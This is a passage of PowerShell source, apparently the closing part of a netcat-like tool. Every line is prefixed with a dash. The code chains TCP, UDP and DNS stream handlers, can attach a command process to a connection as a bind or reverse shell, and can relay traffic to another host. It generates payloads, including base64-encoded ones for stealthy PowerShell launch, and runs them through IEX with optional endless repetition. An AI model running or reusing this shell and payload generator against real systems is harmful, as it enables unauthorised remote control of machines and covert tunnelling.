- $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
- $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
- $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
- if($l){return "This feature is not available."}
- else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "}
- }
- else
- {
- Write-Verbose "Set Stream 1: TCP"
- $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
- $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
- $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
- $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
- if($l){$InvokeString = "Main @('',`$True,$p,$t) "}
- else{$InvokeString = "Main @('$c',`$False,$p,$t) "}
- }
- if($e -ne "")
- {
- Write-Verbose "Set Stream 2: Process"
- $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n")
- $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_CMD} + "`n}`n`n")
- $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n")
- $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n")
- $InvokeString += "@('$e')`n`n"
- }
- elseif($ep)
- {
- Write-Verbose "Set Stream 2: Powershell"
- $InvokeString += "`n`n"
- }
- elseif($r -ne "")
- {
- if($r.split(":")[0].ToLower() -eq "udp")
- {
- Write-Verbose "Set Stream 2: UDP"
- $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n")
- $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n")
- $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n")
- $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n")
- if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
- elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
- else{return "Bad relay format."}
- }
- if($r.split(":")[0].ToLower() -eq "dns")
- {
- Write-Verbose "Set Stream 2: DNS"
- $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n")
- $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n")
- $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n")
- $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n")
- if($r.split(":").Count -eq 2){return "This feature is not available."}
- elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")}
- else{return "Bad relay format."}
- }
- elseif($r.split(":")[0].ToLower() -eq "tcp")
- {
- Write-Verbose "Set Stream 2: TCP"
- $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n")
- $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n")
- $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n")
- $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n")
- if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")}
- elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")}
- else{return "Bad relay format."}
- }
- }
- else
- {
- Write-Verbose "Set Stream 2: Console"
- $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n")
- $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n")
- $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n")
- $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n")
- $InvokeString += ("@('" + $o + "')")
- }
- if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")}
- else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")}
- $InvokeString = ($FunctionString + $InvokeString)
- ########## GENERATE PAYLOAD ##########
- ########## RETURN GENERATED PAYLOADS ##########
- if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))}
- elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString}
- ########## RETURN GENERATED PAYLOADS ##########
- ########## EXECUTION ##########
- $Output = $null
- try
- {
- if($rep)
- {
- while($True)
- {
- $Output += IEX $InvokeString
- Start-Sleep -s 2
- Write-Verbose "Repetition Enabled: Restarting..."
- }
- }
- else
- {
- $Output += IEX $InvokeString
- }
- }
- finally
- {
- if($Output -ne $null)
- {
- if($of -eq ""){$Output}
- else{[io.file]::WriteAllBytes($of,$Output)}
- }
- }
- ########## EXECUTION ##########
- }
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